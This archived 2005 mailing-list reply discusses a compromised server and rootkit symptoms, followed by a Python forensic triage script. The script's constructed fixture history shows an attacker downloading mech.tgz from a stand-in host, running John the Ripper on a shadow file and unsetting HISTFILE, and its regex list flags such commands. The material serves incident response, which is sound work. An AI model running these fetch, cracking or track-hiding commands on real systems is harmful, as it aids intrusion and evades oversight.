Security Incidents mailing list archives
Re: SSH compiled with backdoor
From: Peter Kosinar <goober () ksp sk>
Date: Thu, 1 Sep 2005 02:24:27 +0200 (CEST)
This mail was originally sent to the original poster's address but (what a surprise :-) ) it bounced because of the phony address he used. Therefore, I'm sending it here...
Hello Steve!
> According to john, a couple of users had weak passwords, but root seemed well protected. From looking in all the bash_history, it appears the hacker came in from the website account, and did an su from there.
Hmm... did you perform some kind of post-mortem analysis of the system? For example, did you find the john.pot file, where JTR stores the cracked passwords? Did the /lib/java directory contain any interesting data? Did you find the way the attacker used to obtain root (assuming that the password wasn't cracked)?
> I found this about a month later when I logged into the box, did an ls, only to be met by a seg fault. A ps x showed mech.tgz trying to be

'ls' causing a segfault is a common symptom of an installed rootkit. Did you look for some other misbehaving programs? In fact, as you are running a 2.4 series kernel, it might be a kernel-level rootkit called SucKit, which is, according to my experience, quite popular among .ro badguys.
Peter Kosinar

--
[Name] Peter Kosinar
[Quote] 2B | ~2B = exp(i*PI)
[ICQ] 134813278
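The post-mortem checks Peter asks about above (su activity in the compromised account's bash_history, a john.pot file left behind by John the Ripper, an unexpected /lib/java directory) can be mechanised over a mounted disk image. The following is an added example written for this archive page, not code from the original message or from any tool named in it; the history lines, the download URL and the directory layout it builds are constructed samples, and the indicator list is an assumption about what a responder would want flagged.

```python
"""Triage helper for the checks discussed in the thread (added example).

It scans shell history files for su / cracker / download activity and walks
a filesystem image for john.pot files and a top-level /lib/java directory.
Everything it operates on in demo() is constructed inside a temp dir.
"""
import os
import re
import tempfile

# (regex, reason) pairs a responder would flag in a compromised account's
# history. mech.tgz, john and /lib/java come from the thread; the rest are
# assumptions for this demo.
HISTORY_INDICATORS = [
    (re.compile(r"^\s*su\b"), "switch to another user (su) from this account"),
    (re.compile(r"\bjohn\b"), "John the Ripper invoked"),
    (re.compile(r"\bmech(\.tgz)?\b"), "reference to mech.tgz (IRC bot named in the thread)"),
    (re.compile(r"\b(wget|curl|ftp)\b"), "download tool run from a shell account"),
    (re.compile(r"\bhistory\s+-c\b|unset\s+HISTFILE"), "attempt to clear shell history"),
]

# Constructed sample history for the "website" account (not real data).
CONSTRUCTED_HISTORY = [
    "ls -la\n",
    "cd /tmp\n",
    "wget http://example.invalid/mech.tgz\n",   # constructed URL
    "tar xzf mech.tgz\n",
    "su\n",
    "cd /lib/java\n",
    "./john --wordlist=words.txt shadow.txt\n",
    "unset HISTFILE\n",
]


def scan_history(lines):
    """Return [(line_number, command, reason), ...] for suspicious commands."""
    hits = []
    for n, cmd in enumerate(lines, start=1):
        for rx, reason in HISTORY_INDICATORS:
            if rx.search(cmd):
                hits.append((n, cmd.rstrip("\n"), reason))
                break  # one reason per line is enough for triage
    return hits


def find_cracker_artifacts(root):
    """Walk an image mounted at `root`; return john.pot files and a
    top-level lib/java directory if present, both mentioned in the thread."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        rel = os.path.relpath(dirpath, root)
        if rel == os.path.join("lib", "java"):
            found.append(dirpath)
        if "john.pot" in filenames:
            found.append(os.path.join(dirpath, "john.pot"))
    return sorted(found)


def triage_image(root):
    """Scan every home/*/.bash_history and root/.bash_history under `root`."""
    report = {}
    home_dirs = [os.path.join(root, "root")]
    home = os.path.join(root, "home")
    if os.path.isdir(home):
        home_dirs += [os.path.join(home, d) for d in sorted(os.listdir(home))]
    for d in home_dirs:
        hist = os.path.join(d, ".bash_history")
        if os.path.isfile(hist):
            with open(hist, encoding="utf-8", errors="replace") as fh:
                hits = scan_history(fh.readlines())
            if hits:
                report[os.path.relpath(hist, root)] = hits
    return report


def build_demo_image(root):
    """Lay out a constructed image: website account history and /lib/java/john.pot."""
    os.makedirs(os.path.join(root, "home", "website"), exist_ok=True)
    os.makedirs(os.path.join(root, "lib", "java"), exist_ok=True)
    with open(os.path.join(root, "home", "website", ".bash_history"), "w") as fh:
        fh.writelines(CONSTRUCTED_HISTORY)
    with open(os.path.join(root, "lib", "java", "john.pot"), "w") as fh:
        fh.write("$1$constructed$notarealhash:password1\n")  # constructed


def demo():
    """Build the constructed image, run both checks, return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_demo_image(root)
        return {
            "history": triage_image(root),
            "artifacts": [os.path.relpath(p, root) for p in find_cracker_artifacts(root)],
        }


if __name__ == "__main__":
    result = demo()
    for hist, hits in result["history"].items():
        print(f"== {hist}")
        for n, cmd, reason in hits:
            print(f"  line {n}: {cmd!r}  <- {reason}")
    print("artifacts:", result["artifacts"])
```

The history scan only answers the "who did su from where" question the thread raises; it says nothing about a kernel-level rootkit such as the SucKit Peter mentions, which would have to be investigated from outside the running system, since a rootkit that makes ls segfault cannot be trusted to report on itself.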